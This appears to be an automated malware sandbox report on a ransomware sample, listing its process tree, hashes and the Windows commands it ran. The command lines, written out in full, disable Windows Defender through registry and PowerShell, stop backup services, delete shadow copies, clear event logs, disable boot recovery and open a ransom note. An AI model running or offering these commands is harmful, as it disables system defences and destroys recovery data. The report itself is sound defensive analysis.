3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1160 wrote to memory of 1568 1160 net.exe net1.exe PID 1160 wrote to memory of 1568 1160 net.exe net1.exe PID 1160 wrote to memory of 1568 1160 net.exe net1.exe PID 1748 wrote to memory of 560 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 560 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 560 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 560 wrote to memory of 824 560 net.exe net1.exe PID 560 wrote to memory of 824 560 net.exe net1.exe PID 560 wrote to memory of 824 560 net.exe net1.exe PID 1748 wrote to memory of 1516 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1516 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1516 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1516 wrote to memory of 1300 1516 net.exe net1.exe PID 1516 wrote to memory of 1300 1516 net.exe net1.exe PID 1516 wrote to memory of 1300 1516 net.exe net1.exe PID 1748 wrote to memory of 1988 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1988 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1988 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1988 wrote to memory of 1032 1988 net.exe net1.exe PID 1988 wrote to memory of 1032 1988 net.exe net1.exe PID 1988 wrote to memory of 1032 1988 net.exe net1.exe PID 1748 wrote to memory of 1712 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1712 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1712 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1712 wrote to memory of 1144 1712 net.exe net1.exe PID 1712 wrote to memory of 1144 1712 net.exe net1.exe PID 1712 wrote to memory of 1144 1712 net.exe net1.exe PID 1748 wrote to memory of 2028 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 2028 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 2028 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 2028 wrote to memory of 1692 2028 net.exe net1.exe PID 2028 wrote to memory of 1692 2028 net.exe net1.exe PID 2028 wrote to memory of 1692 2028 net.exe net1.exe PID 1748 wrote to memory of 1420 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1420 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1420 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1420 wrote to memory of 1008 1420 net.exe net1.exe PID 1420 wrote to memory of 1008 1420 net.exe net1.exe PID 1420 wrote to memory of 1008 1420 net.exe net1.exe PID 1748 wrote to memory of 1656 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1656 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1656 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1304 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1304 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1304 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1968 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1968 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1968 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1952 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1952 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 1952 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 636 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 636 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 636 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 1748 wrote to memory of 896 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:580
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1568
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:824
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1300
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1032
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1144
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1692
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1008
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1656
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1304
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1968
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1952
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:636
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:896
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1664
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1688
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1284
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:584
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:548
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1384
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1824
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1300
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1028
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1120
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:860
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:848
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1452
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2040
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:684
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1064
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1708
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1280
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1556
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:368
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1588
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:284
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1056
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1936
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1356
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1956
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1168
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1552
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:520
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1820 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:828
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1052 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:904 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:572 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1832 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1724 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1488 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1072
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:944 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:108 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2096 -
C:\Windows\system32\notepad.exenotepad.exe C:\wbzc_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2472 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"2⤵PID:2480
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2504
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD502c407da2f40abf4360451a9267406bb
SHA1df883e6533a6e78ef1ce8017299d5403375917e7
SHA25621d8e477dd0abe67dfd55baa0759492f5164b113c8c1151d69ddc791ed2f4475
SHA512eeebd3cbb4435c458ff046d23961f712c84ebb1fd7f624ce938f5da3001dbe411dbe1a3981770f0b487dc53cca24418c1a7c451d1df96429edbf1954fef8e79e
-
MD5
94140f86ecb9d062265eac7b7795646a
SHA13db5ede5d02c592e82133318f404592b4b547288
SHA256542850d1bc9b7db0628229dd0fcf63deea399a04ab395f02261a76fd6a29ab60
SHA5125a85cb40cc4235080064e09a0f32be259d00cb5308868c76a09dbb596386a17a864b65fca60366eba91a886e422ca45a7441b45a27ca40f564473b6d656da543